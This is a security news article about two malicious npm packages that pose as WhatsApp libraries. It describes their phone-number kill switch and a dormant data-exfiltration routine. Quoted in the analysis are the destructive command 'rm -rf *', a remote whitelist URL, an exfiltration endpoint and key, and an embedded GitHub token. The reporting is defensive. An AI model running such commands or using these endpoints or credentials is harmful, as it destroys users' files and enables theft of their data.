Weaponized npm Packages Target WhatsApp Developers with Remote Kill Switch

Socket’s Threat Research Team has uncovered a sophisticated supply chain attack targeting developers integrating with the WhatsApp Business API.

Two malicious npm packages, naya-flore and nvlore-hsc, published by the npm user nayflore using the email [email protected], disguise themselves as legitimate WhatsApp socket libraries.

These packages exploit the growing ecosystem of third-party tools for WhatsApp automation, which has surged alongside the platform’s adoption by over 200 million businesses worldwide.

Developers often rely on libraries like whatsapp-web.js and baileys for building chatbots and messaging integrations, making these malicious alternatives particularly deceptive.

With over 1,110 downloads in a month, the packages remain active on the npm registry despite takedown requests submitted to the npm security team.

The attack vector leverages a remote-controlled destruction mechanism triggered by phone number verification, representing an escalation from typical data theft to outright system sabotage.

According to the report, Socket’s AI scanner detected the anomalous behavior, including obfuscated network requests and destructive commands, highlighting the packages’ intent to blend into normal development workflows while harboring catastrophic capabilities.

Remote Kill Switch

At the core of the attack is a phone number-based kill switch embedded within the packages’ requestPairingCode function, which mimics authentic WhatsApp pairing processes to lure developers.

Upon execution, the function fetches a Base64-obfuscated database of whitelisted phone numbers from a GitHub repository at https://raw.githubusercontent.com/navaLinh/database/main/seska.json.

This endpoint, decoded from strings like “aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdmFMaW5oL2RhdGFiYXNlL21haW4vc2Vza2EuanNvbg==”, hosts a list primarily of Indonesian mobile numbers that bypass the destruction logic.

If the provided phone number matches an entry in this remotely updatable database, the package proceeds with seemingly normal WhatsApp socket operations, utilizing familiar structures like makeSocket configurations that echo legitimate libraries such as baileys.

However, for unlisted numbers, the function sets a flag to “0000” and executes the command ‘rm -rf *’, recursively deleting all files in the current directory after initial pairing appears successful.

This delayed trigger enhances stealth, allowing the package to pass cursory testing while enabling threat actors to selectively target victims based on geographic or demographic profiles.

The pairKey parameter further bolsters the illusion of legitimacy, serving no functional role in the kill switch but aligning with expected WhatsApp API patterns to evade suspicion during code reviews.

Dormant Exfiltration

Beyond destruction, the packages include dormant data exfiltration capabilities via the generateCreeds function, which is designed to send device information including phone numbers, identifiers, and status to https://api.verylinh.my.id/running using POST requests with a Base64-encoded key ‘ZnVja19nb2Q’.

Although these calls are commented out in the current versions, their presence indicates ready infrastructure for reactivation, potentially in future iterations to collect reconnaissance data from whitelisted systems before any destructive actions.

Additionally, naya-flore embeds an unused GitHub Personal Access Token ‘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’, which could grant unauthorized access to private repositories, though its exact purpose remains unclear and may point to unfinished attack features.

The same author has published other packages like nouku-search, very-nay, naya-clone, node-smsk, and @veryflore/disc, which appear benign but demand scrutiny given the context.

This incident underscores evolving threats in niche developer communities, where attackers exploit trust in open-source ecosystems to deploy geographically targeted malware.

Organizations should audit dependencies for suspicious network activity, file system manipulations, and unnecessary sensitive inputs, while tools like Socket’s GitHub App, CLI, browser extension, and MCP can preemptively detect such risks by scanning for kill switch patterns and exfiltration attempts.

Indicators of Compromise (IOCs)

The Ultimate SOC-as-a-Service Pricing Guide for 2025– Download for Free